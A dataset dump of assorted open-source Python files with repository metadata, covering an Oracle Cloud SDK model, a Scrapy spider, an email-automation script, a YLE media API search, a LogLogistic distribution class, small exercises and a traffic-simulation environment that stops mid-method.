max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
src/oci/core/models/update_drg_attachment_details.py | LaudateCorpus1/oci-python-sdk | 0 | 12760951 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateDrgAttachmentDetails(object):
"""
UpdateDrgAttachmentDetails model.
"""
def __init__(self, **kwargs):
"""
Initializes a new UpdateDrgAttachmentDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param display_name:
The value to assign to the display_name property of this UpdateDrgAttachmentDetails.
:type display_name: str
:param drg_route_table_id:
The value to assign to the drg_route_table_id property of this UpdateDrgAttachmentDetails.
:type drg_route_table_id: str
:param network_details:
The value to assign to the network_details property of this UpdateDrgAttachmentDetails.
:type network_details: oci.core.models.DrgAttachmentNetworkUpdateDetails
:param defined_tags:
The value to assign to the defined_tags property of this UpdateDrgAttachmentDetails.
:type defined_tags: dict(str, dict(str, object))
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateDrgAttachmentDetails.
:type freeform_tags: dict(str, str)
:param export_drg_route_distribution_id:
The value to assign to the export_drg_route_distribution_id property of this UpdateDrgAttachmentDetails.
:type export_drg_route_distribution_id: str
:param route_table_id:
The value to assign to the route_table_id property of this UpdateDrgAttachmentDetails.
:type route_table_id: str
"""
self.swagger_types = {
'display_name': 'str',
'drg_route_table_id': 'str',
'network_details': 'DrgAttachmentNetworkUpdateDetails',
'defined_tags': 'dict(str, dict(str, object))',
'freeform_tags': 'dict(str, str)',
'export_drg_route_distribution_id': 'str',
'route_table_id': 'str'
}
self.attribute_map = {
'display_name': 'displayName',
'drg_route_table_id': 'drgRouteTableId',
'network_details': 'networkDetails',
'defined_tags': 'definedTags',
'freeform_tags': 'freeformTags',
'export_drg_route_distribution_id': 'exportDrgRouteDistributionId',
'route_table_id': 'routeTableId'
}
self._display_name = None
self._drg_route_table_id = None
self._network_details = None
self._defined_tags = None
self._freeform_tags = None
self._export_drg_route_distribution_id = None
self._route_table_id = None
@property
def display_name(self):
"""
Gets the display_name of this UpdateDrgAttachmentDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:return: The display_name of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this UpdateDrgAttachmentDetails.
A user-friendly name. Does not have to be unique, and it's changeable.
Avoid entering confidential information.
:param display_name: The display_name of this UpdateDrgAttachmentDetails.
:type: str
"""
self._display_name = display_name
@property
def drg_route_table_id(self):
"""
Gets the drg_route_table_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the DRG route table that is assigned to this attachment.
The DRG route table manages traffic inside the DRG.
You can't remove a DRG route table from a DRG attachment, but you can reassign which
DRG route table it uses.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:return: The drg_route_table_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._drg_route_table_id
@drg_route_table_id.setter
def drg_route_table_id(self, drg_route_table_id):
"""
Sets the drg_route_table_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the DRG route table that is assigned to this attachment.
The DRG route table manages traffic inside the DRG.
You can't remove a DRG route table from a DRG attachment, but you can reassign which
DRG route table it uses.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param drg_route_table_id: The drg_route_table_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._drg_route_table_id = drg_route_table_id
@property
def network_details(self):
"""
Gets the network_details of this UpdateDrgAttachmentDetails.
:return: The network_details of this UpdateDrgAttachmentDetails.
:rtype: oci.core.models.DrgAttachmentNetworkUpdateDetails
"""
return self._network_details
@network_details.setter
def network_details(self, network_details):
"""
Sets the network_details of this UpdateDrgAttachmentDetails.
:param network_details: The network_details of this UpdateDrgAttachmentDetails.
:type: oci.core.models.DrgAttachmentNetworkUpdateDetails
"""
self._network_details = network_details
@property
def defined_tags(self):
"""
Gets the defined_tags of this UpdateDrgAttachmentDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The defined_tags of this UpdateDrgAttachmentDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this UpdateDrgAttachmentDetails.
Defined tags for this resource. Each key is predefined and scoped to a
namespace. For more information, see `Resource Tags`__.
Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param defined_tags: The defined_tags of this UpdateDrgAttachmentDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this UpdateDrgAttachmentDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:return: The freeform_tags of this UpdateDrgAttachmentDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this UpdateDrgAttachmentDetails.
Free-form tags for this resource. Each tag is a simple key-value pair with no
predefined name, type, or namespace. For more information, see `Resource Tags`__.
Example: `{\"Department\": \"Finance\"}`
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm
:param freeform_tags: The freeform_tags of this UpdateDrgAttachmentDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def export_drg_route_distribution_id(self):
"""
Gets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
are advertised out through the attachment.
If this value is null, no routes are advertised through this attachment.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:return: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._export_drg_route_distribution_id
@export_drg_route_distribution_id.setter
def export_drg_route_distribution_id(self, export_drg_route_distribution_id):
"""
Sets the export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
The `OCID`__ of the export route distribution used to specify how routes in the assigned DRG route table
are advertised out through the attachment.
If this value is null, no routes are advertised through this attachment.
__ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm
:param export_drg_route_distribution_id: The export_drg_route_distribution_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._export_drg_route_distribution_id = export_drg_route_distribution_id
@property
def route_table_id(self):
"""
Gets the route_table_id of this UpdateDrgAttachmentDetails.
This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
For information about why you would associate a route table with a DRG attachment, see:
* `Transit Routing: Access to Multiple VCNs in Same Region`__
* `Transit Routing: Private Access to Oracle Services`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
:return: The route_table_id of this UpdateDrgAttachmentDetails.
:rtype: str
"""
return self._route_table_id
@route_table_id.setter
def route_table_id(self, route_table_id):
"""
Sets the route_table_id of this UpdateDrgAttachmentDetails.
This is the `OCID`__ of the route table that is used to route the traffic as it enters a VCN through this attachment.
For information about why you would associate a route table with a DRG attachment, see:
* `Transit Routing: Access to Multiple VCNs in Same Region`__
* `Transit Routing: Private Access to Oracle Services`__
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitrouting.htm
__ https://docs.cloud.oracle.com/iaas/Content/Network/Tasks/transitroutingoracleservices.htm
:param route_table_id: The route_table_id of this UpdateDrgAttachmentDetails.
:type: str
"""
self._route_table_id = route_table_id
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 2.03125 | 2 |
hello-world/helloworld/spiders/hello.py | beifengle/tutorial-scrapy | 0 | 12760952 | <gh_stars>0
import scrapy
from helloworld.items import HelloworldItem
from scrapy.shell import inspect_response
from scrapy.utils.response import open_in_browser
class HelloSpider(scrapy.Spider):
name = 'hello' #指定此爬虫spider在项目中的唯一名称
allowed_domains = ['toscrape.com'] #爬取范围
start_urls = ['http://toscrape.com/'] #抓取起始地址
def parse(self, response):
''' Contracts合约规则
@url http://toscrape.com/
@returns items 1 5
@returns requests 0 1
@scrapes title
'''
# inspect_response(response, self) #2.8章节 scrapy shell测试用例代码,打断点调试,并进入shell模式
# open_in_browser(response)##2.8章节 调用浏览器打开下载得到的响应体
title = response.xpath('//title/text()').extract_first("")
print("解析提取到title:",title)
hello_item = HelloworldItem()
hello_item['title'] = title
import time
time.sleep(5)
# from scrapy.exceptions import CloseSpider
# raise CloseSpider(reason="大哥,我不想爬取了。")
yield hello_item
# yield scrapy.Request(url="http://books.toscrape.com/", #2.8章节 scrapy parse测试用例代码
# dont_filter=True,
# callback=self.parse_2)
def parse_2(self, response):
''' Contracts合约规则
@url http://books.toscrape.com/
@returns items 1 5
@scrapes title
'''
title = response.xpath('//title/text()').extract_first("").strip()
print("解析提取到title2:", title)
hello_item = HelloworldItem()
hello_item['title'] = title
yield hello_item
def closed(self, reason):
print('===爬虫关闭原因===:', reason)
| 3.140625 | 3 |
algorithm/common.py | VatsalP/algorithm | 0 | 12760953 | <filename>algorithm/common.py
from typing import *
T = TypeVar('T')
| 1.40625 | 1 |
Mailautomation.py | akpythonyt/Mystuffs | 47 | 12760954 | <reponame>akpythonyt/Mystuffs
import yagmail
receiver = "reciever email"
message = ("Hello there from Yagmai",'Test1.pdf')
sender = yagmail.SMTP("sender email")
sender.send(
to=receiver,
subject="Yagmail test with attachment",
contents=message
)
| 1.992188 | 2 |
api_search_media.py | Ella-Botti/ella-backend | 0 | 12760955 | import json
import urllib.request
from dotenv import load_dotenv
import os
from pathlib import Path
from urllib.parse import quote
#.env käyttöön tarvittavat konfiguraatiot
dotenv_path = Path('./.env')
load_dotenv(dotenv_path=dotenv_path)
API_KEY = os.getenv('API_KEY')
API_ID = os.getenv('API_ID')
def get_media(keyword, type) :
#korvataan välilyönnin käyttö %20
keyword = quote(keyword)
with urllib.request.urlopen(f'https://external.api.yle.fi/v1/programs/items.json?q={keyword}&type={type}&app_key={API_KEY}&app_id={API_ID}') as response:
data = response.read()
media = json.loads(data)
filtered_list = []
#luodaan media-olio ja lisätään listaan
for item in media['data']:
media_item = f'http://areena.yle.fi/{item["id"]}'
filtered_list.append(media_item)
return filtered_list
def get_tag(type, category):
with urllib.request.urlopen(f'https://external.api.yle.fi/v1/programs/items.json?type={type}&category={category}&app_key={API_KEY}&app_id={API_ID}') as response:
data = response.read()
media = json.loads(data)
filtered_list = []
#luodaan media-olio ja lisätään listaan
for item in media['data']:
media_item = f'http://areena.yle.fi/{item["id"]}'
filtered_list.append(media_item)
return filtered_list
| 2.609375 | 3 |
14.py | jsplyy/PythonTip | 0 | 12760956 | <reponame>jsplyy/PythonTip
import this
print this.s | 1.070313 | 1 |
archive/old_poly_conversion.py | HypenauticPulse/HypeCAS | 1 | 12760957 | <reponame>HypenauticPulse/HypeCAS<filename>archive/old_poly_conversion.py<gh_stars>1-10
def poly_conversion_array(eq, var):
poly = eq.split()
coeffPower = []
i = 1
while i < len(poly):
poly.insert(i, poly[i] + poly[i + 1])
poly.pop(i + 1)
poly.pop(i + 1)
i += 1
for j in poly:
cp = j.split(var)
if len(cp) == 1:
cp.append(0)
for k in range(len(cp)):
cp[k] = float(cp[k])
coeffPower.append(cp)
else:
if '^' in cp[1]:
if cp[0] == '':
Temp = cp[1]
Temp.split('^')
cp.pop(1)
cp.append(Temp[1])
cp.pop(0)
cp.insert(0, 1)
for k in range(len(cp)):
cp[k] = float(cp[k])
coeffPower.append(cp)
else:
Temp = cp[1]
Temp.split('^')
cp.pop(1)
cp.append(Temp[1])
for k in range(len(cp)):
cp[k] = float(cp[k])
coeffPower.append(cp)
elif cp[1] == '':
if cp[0] == '':
coeffPower.append([float(1), float(1)])
else:
cp.pop(1)
cp.append(1)
for k in range(len(cp)):
cp[k] = float(cp[k])
coeffPower.append(cp)
return coeffPower | 2.59375 | 3 |
exercicios/exe096/exe096.py | tiagolsouza/exercicios-Curso-em-video-PYTHON | 0 | 12760958 | a = 50
print('\033[32m_\033[m' * a)
print(f'\033[1;32m{"SISTEMA DE CALCULO DE AREA":=^{a}}\033[m')
print('\033[32m-\033[m' * a)
def area(a, b):
tot = a * b
print(f'\033[1;34mA area de um terreno de {a:.2f} x {b:.2f} é de {tot:.2f}m².\033[m')
larg = float(input('\033[35mLargura do terreno (m): '))
comp = float(input('\033[35mComprimento do terreno (m): '))
area(larg, comp)
| 3.53125 | 4 |
surpyval/parametric/loglogistic.py | dfm/SurPyval | 0 | 12760959 | <gh_stars>0
import autograd.numpy as np
from scipy.stats import uniform
from numpy import euler_gamma
from scipy.special import gamma as gamma_func
from scipy.special import ndtri as z
from surpyval import xcn_handler
from surpyval import parametric as para
from surpyval.parametric.parametric_fitter import ParametricFitter
class LogLogistic_(ParametricFitter):
def __init__(self, name):
self.name = name
self.k = 2
self.bounds = ((0, None), (0, None),)
self.support = (0, np.inf)
self.plot_x_scale = 'log'
self.y_ticks = [0.0001, 0.0002, 0.0003, 0.001, 0.002,
0.003, 0.005, 0.01, 0.02, 0.03, 0.05,
0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8,
0.9, 0.95, 0.99, 0.999, 0.9999]
self.param_names = ['alpha', 'beta']
self.param_map = {
'alpha' : 0,
'beta' : 1
}
def _parameter_initialiser(self, x, c=None, n=None, t=None, offset=False):
if offset:
# return *self.fit(x, c, n, t, how='MPP').params, 1.
x, c, n = xcn_handler(x, c, n)
flag = (c == 0).astype(int)
value_range = np.max(x) - np.min(x)
gamma_init = np.min(x) - value_range / 10
return gamma_init, x.sum() / (n * flag).sum(), 2., 1.
else:
return self.fit(x, c, n, t, how='MPP').params
# x, c, n = surpyval.xcn_handler(x, c, n)
# flag = (c == 0).astype(int)
# return x.sum() / (n * flag).sum(), 2.
def sf(self, x, alpha, beta):
r"""
Survival (or reliability) function for the LogLogistic Distribution:
.. math::
R(x) = 1 - \frac{1}{1 + \left ( x /\alpha \right )^{-\beta}}
Parameters
----------
x : numpy array or scalar
The values at which the function will be calculated
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
sf : scalar or numpy array
The value(s) of the reliability function at x.
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> x = np.array([1, 2, 3, 4, 5])
>>> LogLogistic.sf(x, 3, 4)
array([0.62245933, 0.5621765 , 0.5 , 0.4378235 , 0.37754067])
"""
return 1 - self.ff(x, alpha, beta)
def cs(self, x, X, alpha, beta):
r"""
Conditional survival function for the LogLogistic Distribution:
.. math::
R(x, X) = \frac{R(x + X)}{R(X)}
Parameters
----------
x : numpy array or scalar
The values at which the function will be calculated
X : numpy array or scalar
The value(s) at which each value(s) in x was known to have survived
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
cs : scalar or numpy array
The value(s) of the conditional survival function at x.
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> x = np.array([1, 2, 3, 4, 5])
>>> LogLogistic.cs(x, 5, 3, 4)
array([0.51270879, 0.28444803, 0.16902083, 0.10629329, 0.07003273])
"""
return self.sf(x + X, alpha, beta) / self.sf(X, alpha, beta)
def ff(self, x, alpha, beta):
r"""
Failure (CDF or unreliability) function for the LogLogistic Distribution:
.. math::
F(x) = \frac{1}{1 + \left ( x /\alpha \right )^{-\beta}}
Parameters
----------
x : numpy array or scalar
The values at which the function will be calculated
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
ff : scalar or numpy array
The value(s) of the failure function at x.
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> x = np.array([1, 2, 3, 4, 5])
>>> LogLogistic.ff(x, 3, 4)
array([0.01219512, 0.16494845, 0.5 , 0.75964392, 0.88526912])
"""
return 1. / (1 + (x/alpha)**-beta)
def df(self, x, alpha, beta):
r"""
Density function for the LogLogistic Distribution:
.. math::
f(x) = \frac{\left ( \beta / \alpha \right ) \left ( x / \alpha \right )^{\beta - 1}}{\left ( 1 + \left ( x / \alpha \right )^{-\beta} \right )^2}
Parameters
----------
x : numpy array or scalar
The values at which the function will be calculated
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
df : scalar or numpy array
The value(s) of the failure function at x.
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> x = np.array([1, 2, 3, 4, 5])
>>> LogLogistic.df(x, 3, 4)
array([0.0481856 , 0.27548092, 0.33333333, 0.18258504, 0.08125416])
"""
return ((beta/alpha)*(x/alpha)**(beta-1.))/((1. + (x/alpha)**beta)**2.)
def hf(self, x, alpha, beta):
r"""
Instantaneous hazard rate for the LogLogistic Distribution:
.. math::
h(x) = \frac{f(x)}{R(x)}
Parameters
----------
x : numpy array or scalar
The values at which the function will be calculated
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
hf : scalar or numpy array
The value(s) of the instantaneous hazard rate at x.
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> x = np.array([1, 2, 3, 4, 5])
>>> LogLogistic.hf(x, 3, 4)
array([0.04878049, 0.32989691, 0.66666667, 0.75964392, 0.7082153 ])
"""
return self.df(x, alpha, beta) / self.sf(x, alpha, beta)
def Hf(self, x, alpha, beta):
r"""
Cumulative hazard rate for the LogLogistic Distribution:
.. math::
H(x) = -\ln \left ( R(x) \right )
Parameters
----------
x : numpy array or scalar
The values at which the function will be calculated
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
Hf : scalar or numpy array
The value(s) of the cumulative hazard rate at x.
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> x = np.array([1, 2, 3, 4, 5])
>>> LogLogistic.Hf(x, 3, 4)
array([0.01227009, 0.18026182, 0.69314718, 1.42563378, 2.16516608])
"""
return -np.log(self.sf(x, alpha, beta))
def qf(self, p, alpha, beta):
r"""
Quantile function for the LogLogistic distribution:
.. math::
q(p) = \alpha \left ( \frac{p}{1 - p} \right )^{\frac{1}{\beta}}
Parameters
----------
p : numpy array or scalar
The percentiles at which the quantile will be calculated
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
q : scalar or numpy array
The quantiles for the LogLogistic distribution at each value p
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> p = np.array([.1, .2, .3, .4, .5])
>>> LogLogistic.qf(p, 3, 4)
array([1.73205081, 2.12132034, 2.42732013, 2.71080601, 3. ])
"""
return alpha * (p/(1 - p))**(1./beta)
def mean(self, alpha, beta):
r"""
Mean of the LogLogistic distribution
.. math::
E = \frac{\alpha \pi / \beta}{sin \left ( \pi / \beta \right )}
Parameters
----------
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
mean : scalar or numpy array
The mean(s) of the LogLogistic distribution
Examples
--------
>>> from surpyval import LogLogistic
>>> LogLogistic.mean(3, 4)
3
"""
if beta > 1:
return (alpha * np.pi / beta) / (np.sin(np.pi/beta))
else:
return np.nan
def random(self, size, alpha, beta):
r"""
Draws random samples from the distribution in shape `size`
Parameters
----------
size : integer or tuple of positive integers
Shape or size of the random draw
alpha : numpy array or scalar
scale parameter for the LogLogistic distribution
beta : numpy array or scalar
shape parameter for the LogLogistic distribution
Returns
-------
random : scalar or numpy array
Random values drawn from the distribution in shape `size`
Examples
--------
>>> import numpy as np
>>> from surpyval import LogLogistic
>>> LogLogistic.random(10, 3, 4)
array([4.46072122, 2.1336253 , 2.74159711, 2.90125715, 3.2390347 ,
5.45223664, 4.28281376, 2.7017541 , 3.023811 , 2.16225601])
>>> LogLogistic.random((5, 5), 3, 4)
array([[1.97744499, 4.02823921, 1.95761719, 1.20481591, 3.7166738 ],
[2.94863864, 3.02609811, 3.30563774, 2.39100075, 3.24937459],
[3.16102391, 1.77003533, 4.73831093, 0.36936215, 1.41566853],
[3.88505024, 2.88183095, 2.43977804, 2.62385959, 3.40881857],
[1.2349273 , 1.83914641, 3.68502568, 6.49834769, 8.62995574]])
"""
U = uniform.rvs(size=size)
return self.qf(U, alpha, beta)
def mpp_x_transform(self, x, gamma=0):
return np.log(x - gamma)
def mpp_y_transform(self, y, *params):
mask = ((y == 0) | (y == 1))
out = np.zeros_like(y)
out[~mask] = -np.log(1./y[~mask] - 1)
out[mask] = np.nan
return out
def mpp_inv_y_transform(self, y, *params):
return 1./(np.exp(-y) + 1)
def unpack_rr(self, params, rr):
if rr == 'y':
beta = params[0]
alpha = np.exp(params[1]/-beta)
elif rr == 'x':
beta = 1./params[0]
alpha = np.exp(params[1] / (beta * params[0]))
return alpha, beta
LogLogistic = LogLogistic_('LogLogistic') | 2.203125 | 2 |
Lang/Python/dll/pyc/calc/demo.py | Orig5826/Basics | 5 | 12760960 | <reponame>Orig5826/Basics
import os
import calc_module as calc
print("乘方计算:")
for i in range(100):
ret = calc.py_get_squre(i)
print("{0:4d}={1:4.0f} ".format(i, ret), end='')
if (i+1) % 10 == 0:
print()
os.system("pause")
| 2.921875 | 3 |
env.py | hiwonjoon/cs391-reinforce | 4 | 12760961 | # -*- coding: utf-8 -*-
import better_exceptions
import random
import numpy as np
import math
from asciimatics.screen import Screen
class ViolateRule() :
def __init__(self,message):
self.message = message
class World(object) :
line_alloc = [1,2,2,1,1] #side_walk, road, road, side_walk, traffic_light
line_range = [[0],[1,2],[3,4],[5],[6]]
road_length=100
"""
_t = 0
_range = [] #for coordinate transform(due to line drawing)
for line in self.line_alloc :
_range.append(range(_t,_t+line))
_t += line
"""
def __init__(self,time_step=1.0/100) :
self.global_time = 0.0
self.time_step = time_step
self.objects = []
#debug message
self.debug_list = []
self.message = []
def add_obj(self,obj,debug=False) :
assert(isinstance(obj,GameObject))
self.objects.append(obj)
if( debug ) :
self.debug_list.append(obj)
return self
def tick(self) :
# Tick
for obj in self.objects:
for e in obj.tick(self.time_step) :
if( e is not None and obj in self.debug_list ):
self.message.append(e.message)
# Interaction
for obj_a in self.objects :
for obj_b in self.objects :
if( obj_a == obj_b ) : continue
for e in obj_a.interact(obj_b,self.time_step) :
if( e is not None and obj_a in self.debug_list ):
self.message.append(e.message)
# Constraint Check(Interaction with wall..) or Delteable Object
for obj in self.objects: pass #TODO: Nothing to do for now.
self.objects = [obj for obj in self.objects if not obj.remove]
self.global_time += self.time_step
return self.time_step
def draw_lines(self,screen) : # Let's draw lines/one time call
_t = 0
for line,c in zip(self.line_alloc[:-1],[7,3,7,1,4]) :
screen.move(0,_t+line)
screen.draw(self.road_length,_t+line,thin=True,colour=c)
_t += line+1
def draw(self,screen) :
current_map = np.empty((self.road_length,sum(self.line_alloc)),dtype=object)
for obj in self.objects: current_map[obj.loc[0],obj.loc[1]] = obj
# Let's draw objects
for x in range(self.road_length) :
for y in range(sum(self.line_alloc)) :
if( current_map[x,y] is None ) :
screen.print_at(' ', x,y+[k for k,_t in enumerate(self.line_range) if y in _t][-1] )
else :
screen.print_at( current_map[x,y].char(), x,y+[k for k,_t in enumerate(self.line_range) if y in _t][-1],
**current_map[x,y].repre() )
# Debug Info
screen.print_at('%3.3f Secs'%(self.global_time), self.road_length+1,0)
for i,msg in enumerate(self.message) :
screen.print_at(msg, self.road_length+1,i+1)
#msg = '%s'%(current_map)
#screen.print_at(msg,0,sum(self.line_alloc)+len(self.line_alloc)+1)
class GameObject(object) :
def __init__(self,x,y) :
self.loc = np.array((x,y),np.int32)
self.remove = False
def tick(self,delta) :
pass
def char(self) :
return '*'
def repre(self) :
return {}
def interact(self,other,delta) :
# The result of interaction only affect the "self".
pass
def __repr__(self):
return '%s(%d,%d)'%(type(self).__name__,self.loc[0],self.loc[1])
class TrafficLights(GameObject) :
light_color = [3,1,2]
def __init__(self,x,y=6,time_schedule=[2,5,5],start_time=0.0):
GameObject.__init__(self,x,y)
self.state = 0
self.time = start_time
self.time_schedule=time_schedule
def tick(self,delta) :
self.time += delta
if( self.time >= self.time_schedule[self.state] ) :
self.time = 0.0
self.state = (self.state+1)%len(self.time_schedule)
yield
def get_state(self) :
if(self.state == 0) : return 'yellow'
elif(self.state == 1 ) : return 'red'
else : return 'green'
def char(self) :
return u'●'
#return u'0'
def repre(self) :
return {'colour':self.light_color[self.state]}
def _is_crossing(self,car,delta) :
dist_a = (self.loc - car.real_loc)[0]
dist_b = (self.loc - car._predict_loc(delta))[0]
return dist_a * dist_b <= 0
def interact(self,other,delta) :
if (isinstance(other,Car)):
if( self.get_state() == 'red'
and self._is_crossing(other,delta) ):
yield ViolateRule('Ticket!')
yield
class Movable(GameObject) :
def __init__(self,x,y):
GameObject.__init__(self,x,y)
class Car(Movable) :
def __init__(self,x=None,y=None,v=None,state=None):
x = x if x is not None else 0
y = y if y is not None else random.randint(World.line_range[1][0],World.line_range[2][-1])
v = float(v if v is not None else random.randint(1,3))
state = state if state is not None else 'go'
Movable.__init__(self,x,y)
self.real_loc = self.loc.astype(np.float32)
self.maximum_vel = v
self.vel = v
self.direction = -1 if y in World.line_range[1] else 1
self.state = state #'go', 'stop', 'park', 'left', 'right'
self.constraint_queue = [] #if it is empty, state change to 'go'
def char(self) :
if( self.state == 'park' ) :
return 'P'
elif( self.vel == 0.0 ) :
return 'S' #completely stopped
elif( self.state == 'go') :
return u'◀' if( self.direction < 0 ) else u'▶'
elif( self.state == 'stop' ) : #stopping...
return u'↤' if( self.direction < 0 ) else u'↦'
elif( self.state == 'left' ):
return u'⬋' if( self.direction < 0 ) else u'⬈'
elif( self.state == 'right' ):
return u'⬉' if( self.direction < 0 ) else u'⬊'
else :
assert(False)
def tick(self,delta) :
if( self.state == 'park' ) :
yield;return
# Update Changing Lane
if( self.state == 'left' or self.state == 'right' ) :
self.real_loc[1] += (self.direction * (-1 if self.state == 'left' else 1))
self.state = 'go'
if( self.real_loc[1] < World.line_range[1][0] or
self.real_loc[1] > World.line_range[2][-1]) :
yield ViolateRule('Car Off Track!%f'%self.real_loc[1])
self.real_loc[1] = max(min(World.line_range[2][-1], self.real_loc[1]),World.line_range[1][0])
# Update Speed
if( self.state == 'go' ) :
self.vel += delta * self.maximum_vel
elif( self.state == 'stop' ) :
self.vel += delta * -self.maximum_vel
self.vel = max(min(self.maximum_vel, self.vel),0.0)
# Update Location
self.real_loc[0] += delta * self.vel * self.direction
if( self.real_loc[0] < 0 ) : self.real_loc[0] += World.road_length
elif( self.real_loc[0] > World.road_length ) : self.real_loc[0] -= World.road_length
self.loc = self.real_loc.astype(np.int32)
yield
def _predict_loc(self,future_secs) :
pre = np.copy(self.real_loc)
pre[0] += future_secs * self.vel * self.direction
return pre
def _is_in_front(self,car) : #Does I in front of other car?
if( self.direction != car.direction ) : return True
d = self._dist(car)
if( self.real_loc[0] > car.real_loc[0] and
self.real_loc[0] - car.real_loc[0] == d ) :
return True if self.direction > 0 else False
elif( self.real_loc[0] > car.real_loc[0] ) :
return False if self.direction > 0 else True
elif( self.real_loc[0] < car.real_loc[0] and
car.real_loc[0] - self.real_loc[0] == d ) :
return False if self.direction > 0 else True
else :
return True if self.direction > 0 else False
def _dist(self,car) :
if( self.direction != car.direction ):
if( self.direction == 1 ) : # and it means car.direction == -1
return abs(car.real_loc[0] - self.real_loc[0])
else :
return abs(self.real_loc[0] - car.real_loc[0])
else :
# choose the short one as dist; due to cycling behavior
_t = abs(car.real_loc[0] - self.real_loc[0])
return min(_t, World.road_length-_t)
def interact(self,other,delta) :
if( self.state == 'park' ) :
yield;return
if( len(self.constraint_queue) > 0 ) : # means, it is in the stop state.
self.constraint_queue = [q for q in self.constraint_queue if q(other) == False]
if( len(self.constraint_queue) == 0 ):
self.state = 'go'
# interact with other cars and pedestrians and traffic lights.
if (isinstance(other,TrafficLights)) :
if( self.state == 'go') :
dist_a = (other.loc - self.real_loc)[0]
dist_b = (other.loc - self._predict_loc(2.0))[0]
crossing = dist_a * dist_b <= 0
if( crossing ) :
if( other.get_state() == 'red' or
other.get_state() == 'yellow' ) :
self.state = 'stop'
self.constraint_queue.append(lambda o: other == o and other.get_state() == 'green')
elif (isinstance(other,Car)):
if( (other.loc == self.loc).all() ) :
yield ViolateRule('Car Crash!')
if( other.loc[1] == self.loc[1]) : # On the same lane
